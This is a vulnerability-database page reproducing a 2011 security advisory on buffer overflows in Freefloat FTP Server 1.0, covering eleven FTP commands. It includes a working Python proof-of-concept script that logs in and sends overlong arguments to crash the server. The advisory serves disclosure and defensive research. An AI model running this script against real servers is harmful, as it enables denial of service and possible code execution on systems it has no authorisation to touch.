Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Freefloat FTP Server 1.0 Buffer Overflow

🗓️ 05 Aug 2011 00:00:00Reported by Veerendra G.GType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Freefloat FTP Server 1.0 Multiple Commands Buffer Overflow Vulnerabilitie

Code
`###############################################################################  
Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities  
  
SecPod Technologies (www.secpod.com)  
Author: Veerendra G.G  
###############################################################################  
  
SecPod ID: 1019 19/07/2011 Issue Discovered  
19/07/2011 Vendor Notified  
No Response From Vendor  
04/08/2011 Advisory Released  
  
  
Class: Buffer Overflow Severity: High  
  
  
Overview:  
---------  
Freefloat FTP Server Version 1.0 is prone to multiple Commands Buffer Overflow  
vulnerabilities.  
  
  
Technical Description:  
----------------------  
The flaws are caused due to input validation errors while processing DELE,  
MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. These  
can be exploited by sending an overly long command argument causing the  
buffer to overflow.  
  
  
Impact:  
--------  
Successful exploitation may allow remote attackers to execute arbitrary code  
or cause a denial of service condition.  
  
  
Affected Software:  
------------------  
Freefloat FTP Server Version 1.0  
  
  
Tested on:  
-----------  
Freefloat FTP Server Version 1.0 on Windows XP SP3 En.  
  
  
References:  
-----------  
http://secpod.org/blog/?p=310  
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt  
http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php  
  
  
Proof of Concept:  
----------------  
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
  
(or see below)  
  
  
  
Solution:  
----------  
Not available  
  
  
Risk Factor:  
-------------  
CVSS Score Report:   
ACCESS_VECTOR = NETWORK   
ACCESS_COMPLEXITY = LOW   
AUTHENTICATION = SINGLE INSTANCE   
CONFIDENTIALITY_IMPACT = PARTIAL   
INTEGRITY_IMPACT = PARTIAL   
AVAILABILITY_IMPACT = COMPLETE   
EXPLOITABILITY = PROOF_OF_CONCEPT   
REMEDIATION_LEVEL = UNAVAILABLE   
REPORT_CONFIDENCE = CONFIRMED   
CVSS Base Score = 8.0 (AV:N/AC:L/Au:SI/C:P/I:P/A:C)   
CVSS Temporal Score = 7.2   
Risk factor = High   
  
  
Credits:  
--------  
Veerendra G.G of SecPod Technologies has been credited with the discovery of  
this vulnerability.  
  
  
============================================================  
  
  
#!/usr/bin/python  
##############################################################################  
# Title : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities  
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)  
# Vendor : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php  
# Advisory : http://secpod.org/blog/?p=310  
# http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
# http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt  
# Version : Freefloat FTP Server Version 1.0  
# Date : 21/07/2011  
##############################################################################  
  
import sys, socket  
  
  
def exploit(HOST, PORT, CMD):  
try:  
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
tcp_sock.connect((HOST, PORT))  
except Exception, msg:  
print "[-] Not able to connect to : " , HOST  
sys.exit(0)  
  
res = tcp_sock.recv(1024)  
  
if "220 FreeFloat" not in res:  
print "[-] FreeFloat FTP Server Not Found..."  
tcp_sock.close()  
sys.exit(0)  
  
tcp_sock.send("USER test\r\n")  
tcp_sock.recv(1024)  
tcp_sock.send("PASS test\r\n")  
tcp_sock.recv(1024)  
  
tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")  
tcp_sock.close()  
  
  
if __name__ == "__main__":  
  
if len(sys.argv) < 2:  
print "\t[-] Usage: python exploit.py target_ip"  
print "\t[-] Example : python exploit.py 127.0.0.1"  
print "\t[-] Exiting..."  
sys.exit(0)  
  
HOST = sys.argv[1]  
PORT = 21  
  
## Vulnerable Commands  
CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",  
"RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]  
  
for CMD in CMDs:  
print "[+] Connecting with server..."  
exploit(HOST, PORT, CMD)  
print "[+] Exploit Sent with %s command..." %(CMD)  
print "[+] Checking Server Crashed or not..."  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((HOST, PORT))  
s.close()  
except Exception, msg:  
print "[+] Server Crashed with %s Command" %(CMD)  
sys.exit(0)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Aug 2011 00:00Current
0.3Low risk
Vulners AI Score0.3
freefloat ftp serverbuffer overflowinput validationremote attackersarbitrary codedenial of servicewindows xp sp3secpod technologiesdiscovery vulnerability
29